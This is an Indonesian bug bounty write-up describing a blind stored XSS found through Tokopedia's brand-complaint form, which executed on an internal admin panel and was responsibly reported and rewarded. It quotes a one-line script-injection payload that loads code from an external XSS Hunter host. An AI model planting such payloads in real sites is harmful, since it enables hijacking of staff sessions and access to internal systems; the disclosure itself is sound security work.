---
layout: post
title: Blind XSS Pada Internal Panel Tokopedia
date: 2018-11-23 13:37:00 PM
permalink: /project/2018-11-23-blind-xss-pada-internal-panel-tokopedia/
author: xhellc0de
categories: [ pentesting, xss ]
tags: vulnerability xss stored-xss
comments: true
image: /images/tokped_banner.jpg
---
![Image of Tokopedia](/images/tokped_banner.jpg)

Beberapa waktu lalu iseng-iseng mencoba mencari Bug _(lagi)_ di situs Tokopedia. Karena sebelumnya bug yang ditemukan dianggap tidak valid, jadi rasanya masih **gregetan** karena belum nemu bug yang valid XD.

Setelah beberapa menit muter-muter di website Tokopedia, pada akhirnya saya menemukan Form Pengaduan Merk/Produk yang berada pada URL: https://www.tokopedia.com/contact-us/form/ban-product. Lalu saya mencoba memasukan payload XSS Hunter pada field **Name**, berharap payload akan ter-eksekusi pada backend Tokopedia.

```
Name: Anu"><script src=//xxs.ht></
```

![Image of Tokopedia](/images/tokped_band_product.jpg)

Selang beberapa jam, saya mendapat notifikasi pada **XSS Hunter** yang menginformasikan bahwa payload ter-eksekusi pada domain https://internal.tokopedia.com! Berikut Screenshot dari halaman tersebut.

![Image of Tokopedia](/images/tokped_internal_panel.jpg)

Saya segera mengirim email ke security@tokopedia.com terkait temuan ini, dan mereka me-respon dan memberitahu bahwa temuan ini valid dengan severity **HIGH**.

![Image of Tokopedia](/images/tokped_email.jpg)

Pihak Tokopedia cukup responsive dalam menangani issue ini, celah ini diperbaiki dalam waktu kurang lebih 2 minggu. Dan untuk temuan ini, saya diberi reward sebesar **$137**.

Timeline:
```
[ 04 Oct 2018 ]: Bug Ditemukan
[ 04 Oct 2018 ]: Bug Dilaporkan
[ 04 Oct 2018 ]: Konfirmasi Valid dengan severity **HIGH**
[ 18 Oct 2018 ]: Bug Selesai Diperbaiki
[ 21 Nov 2018 ]: Reward sebesar $137
```
